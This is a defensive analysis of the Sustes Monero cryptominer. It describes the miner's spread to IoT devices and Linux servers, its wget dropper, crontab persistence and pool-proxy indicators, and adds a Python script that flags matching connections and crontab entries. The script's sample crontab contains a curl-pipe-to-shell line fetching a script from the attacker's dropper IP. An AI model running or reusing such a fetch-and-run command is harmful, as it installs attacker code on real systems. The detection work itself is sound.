The Sustes malware's activity was uncovered by cybersecurity researchers recently. After analyzing this threat, experts concluded that it is a miner for the Monero cryptocurrency. Over the last decade the popularity of cryptocurrencies has boomed, and cybercriminals saw in this an opportunity to profit on the backs of unwitting users. This has been achieved in a variety of ways: by stealing users' cryptocurrency wallets, by hijacking their clipboards and pasting in the attackers' own wallet addresses, and, of course, by planting cryptocurrency miners like the Sustes malware on users' systems.

Targets IoT Devices and Linux Servers

The Sustes threat appears to use a network scanner to find IoT (Internet-of-Things) devices and Linux servers. Rather than propagating like a worm, the Sustes malware most likely relies on a brute-force attack that probes for weakly secured accounts, which are easy targets to compromise. If that fails, the Sustes malware also attempts publicly known exploits against the intended target. If either succeeds, a `wget` request is issued to a domain under the attackers' control to pull a shell script onto the victim's device, which is then executed. The script scans the infiltrated device for unwanted PIDs (Process IDs of active programs) and kills them off, while checking for active instances of Sustes so as not to interrupt a device that is already in the attackers' net. The same script then assigns shell variables, such as setting f2 to the dropper site (192[.]99[.]142[.]226:8220), and afterwards extends f2 with specific paths, for instance `/xm64` (the miner executable) and `wt.conf` (the configuration file), which are needed to drop the remaining components later on.

Deploys a Custom Set of Monero Pool Proxies

Next, the script runs the dropped miner with its configuration file by issuing several shell commands. A crontab entry is then created that periodically re-downloads and executes the script, giving the infection persistence.

Further analysis of the active Monero pool used by the Sustes threat shows that the attacker deployed a custom, private set of Monero pool proxies, which makes it easier to monitor and block the following addresses:

158[.]69[.]133[.]20 on port 3333
192[.]99[.]142[.]249 on port 3333
202[.]144[.]193[.]110 on port 3333
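Because the pool proxies and the dropper host are fixed addresses, a defender can turn the indicators quoted in this article into a simple host-side check. The script below is an added example written for this article, not code from the malware analysis or from any product: it re-fangs the `[.]`-defanged indicators, flags outbound connections to the pool proxies on port 3333 or to the dropper site on port 8220 in `netstat -tn` style output, and flags crontab entries that reference the dropper host (the persistence mechanism described above). The `netstat` and crontab sample lines are constructed for the demonstration, including a placeholder script name on the dropper host.

```python
"""Flag Sustes indicators in host telemetry (added example, not the analysts' code).

Indicators come from the article: dropper host 192[.]99[.]142[.]226:8220 and the
Monero pool proxies on port 3333. Log formats and sample lines are constructed.
"""
import re


def refang(ioc: str) -> str:
    """Turn a de-fanged indicator such as 192[.]99[.]142[.]226 into a usable address."""
    return ioc.replace("[.]", ".")


DROPPER_HOST = refang("192[.]99[.]142[.]226")
DROPPER_PORT = 8220
POOL_PROXIES = {refang(ip) for ip in ("158[.]69[.]133[.]20",
                                       "192[.]99[.]142[.]249",
                                       "202[.]144[.]193[.]110")}
POOL_PORT = 3333


def flag_connections(netstat_lines):
    """Return (remote_ip, remote_port, reason) for connections to Sustes infrastructure.

    Expects `netstat -tn` style rows: proto recv-q send-q local foreign state.
    """
    hits = []
    for line in netstat_lines:
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue  # header, UDP rows or malformed input
        ip, _, port = fields[4].rpartition(":")
        if not port.isdigit():
            continue
        port = int(port)
        if ip in POOL_PROXIES and port == POOL_PORT:
            hits.append((ip, port, "monero pool proxy"))
        elif ip == DROPPER_HOST and port == DROPPER_PORT:
            hits.append((ip, port, "dropper host"))
    return hits


def flag_crontab(crontab_lines):
    """Return non-comment crontab entries that reference the dropper host."""
    pattern = re.compile(re.escape(DROPPER_HOST))
    return [line for line in crontab_lines
            if not line.lstrip().startswith("#") and pattern.search(line)]


# Constructed sample telemetry: one benign SSH session, three Sustes-related
# connections and one unrelated HTTPS connection.
SAMPLE_NETSTAT = [
    "tcp 0 0 10.0.0.12:22 10.0.0.1:50214 ESTABLISHED",
    "tcp 0 0 10.0.0.12:44192 158.69.133.20:3333 ESTABLISHED",
    "tcp 0 0 10.0.0.12:44200 192.99.142.226:8220 ESTABLISHED",
    "tcp 0 0 10.0.0.12:44210 202.144.193.110:3333 SYN_SENT",
    "tcp 0 0 10.0.0.12:44220 93.184.216.34:443 ESTABLISHED",
]

# Constructed crontab: a legitimate job plus a persistence entry pointing at the
# dropper host (script name is a placeholder, not taken from the analysis).
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * curl -fsSL http://192.99.142.226:8220/PLACEHOLDER_SCRIPT.sh | sh",
]

if __name__ == "__main__":
    for ip, port, reason in flag_connections(SAMPLE_NETSTAT):
        print(f"connection to {ip}:{port} ({reason})")
    for entry in flag_crontab(SAMPLE_CRONTAB):
        print(f"suspicious crontab entry: {entry}")
```

On a live host the two sample lists would be replaced with the output of `netstat -tn` and `crontab -l` (for root and any other user the miner may have used); matching on the pool port alone is deliberately avoided, since port 3333 is also used by legitimate services.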

The Sustes threat filters out a wide range of specific IP addresses, which it makes sure to avoid. These are likely IP addresses linked to cybersecurity companies, since the attackers would not want their threat dissected by experts, or addresses belonging to large, well-secured corporations such as Amazon, where attempting an exploit would be a waste of time. The miner consumes a fair amount of CPU to achieve its ends and may shorten the lifespan of your device. If the Sustes miner is present on your system, it is advisable to remove it immediately with the help of a reputable anti-malware tool.
